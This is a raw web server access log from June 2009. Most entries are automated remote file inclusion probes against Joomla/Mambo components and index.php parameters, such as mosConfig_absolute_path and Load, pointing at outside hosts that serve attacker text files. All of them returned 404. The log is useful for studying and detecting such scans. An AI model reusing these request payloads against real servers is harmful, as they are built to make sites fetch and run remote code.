122.153.212.195 - - [08/Jun/2009:02:40:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:40:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:40:14 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:14 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:40:14 -0400] "GET /logs/access_log.Q109010700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:40:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:40:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:40:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:40:16 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.153.212.195 - - [08/Jun/2009:02:40:21 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:40:22 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:23 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
70.85.165.10 - - [08/Jun/2009:02:40:23 -0400] "GET /index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:40:23 -0400] "GET /logs/index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:40:23 -0400] "GET /logs/access_log.Q109052700%20%20/index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:02:40:23 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:32 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:40:43 -0400] "GET /logs/error_log.Q109042700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:40:51 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:52 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:52 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:40:54 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:40:59 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:40:59 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:41:00 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:41:00 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:41:03 -0400] "GET /logs/access_log.Q109052800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:41:04 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:41:06 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:41:07 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:41:14 -0400] "GET /logs/access_log.Q109010700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:41:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:41:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.153.212.195 - - [08/Jun/2009:02:41:31 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:32 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:32 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:41:33 -0400] "GET /logs/access_log.Q109052800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.153.212.195 - - [08/Jun/2009:02:41:34 -0400] "GET /logs/access_log.Q109010700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:34 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:35 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:36 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
74.6.22.170 - - [08/Jun/2009:02:41:37 -0400] "GET /logs/access_log.Q107073100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.165.10 - - [08/Jun/2009:02:41:43 -0400] "GET /index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:41:43 -0400] "GET /logs/index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:41:43 -0400] "GET /logs/access_log.Q109052700%20%20/index.php?Load=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:46 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.15.161.2 - - [08/Jun/2009:02:41:46 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.xm-cash.com/images/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
122.153.212.195 - - [08/Jun/2009:02:41:55 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:55 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:41:56 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.201.76.100 - - [08/Jun/2009:02:42:11 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:12 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:14 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:14 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:16 -0400] "GET /logs/access_log.Q109010700//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:17 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:42:18 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
58.177.251.221 - - [08/Jun/2009:02:42:18 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
124.0.73.2 - - [08/Jun/2009:02:42:18 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:02:42:18 -0400] "GET /logs/access_log.Q109051700//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:02:42:19 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:42:19 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:42:19 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
122.153.212.195 - - [08/Jun/2009:02:42:21 -0400] "GET /logs/access_log.Q109052600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:42:22 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
58.177.251.221 - - [08/Jun/2009:02:42:22 -0400] "GET /logs/access_log.Q109051800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
124.0.73.2 - - [08/Jun/2009:02:42:23 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.177.251.221 - - [08/Jun/2009:02:42:24 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:42:24 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
58.177.251.221 - - [08/Jun/2009:02:42:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
209.59.12.99 - - [08/Jun/2009:02:42:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [08/Jun/2009:02:43:05 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:43:05 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:43:06 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
122.153.212.195 - - [08/Jun/2009:02:43:07 -0400] "GET /logs/access_log.Q109051800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.65"
58.177.251.221 - - [08/Jun/2009:02:43:10 -0400] "GET /logs/access_log.Q109052400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
122.201.76.100 - - [08/Jun/2009:02:43:12 -0400] "GET /logs/access_log.Q109052500//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:13 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.811"
122.201.76.100 - - [08/Jun/2009:02:43:13 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
216.75.14.10 - - [08/Jun/2009:02:43:14 -0400] "GET /logs/access_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:43:14 -0400] "GET //blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 222 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:43:14 -0400] "GET /logs//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 227 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:43:17 -0400] "GET /logs/access_log.Q109052500//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:43:18 -0400] "GET //blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/5.0"
216.75.14.10 - - [08/Jun/2009:02:43:18 -0400] "GET /logs//blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:02:43:20 -0400] "GET //errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
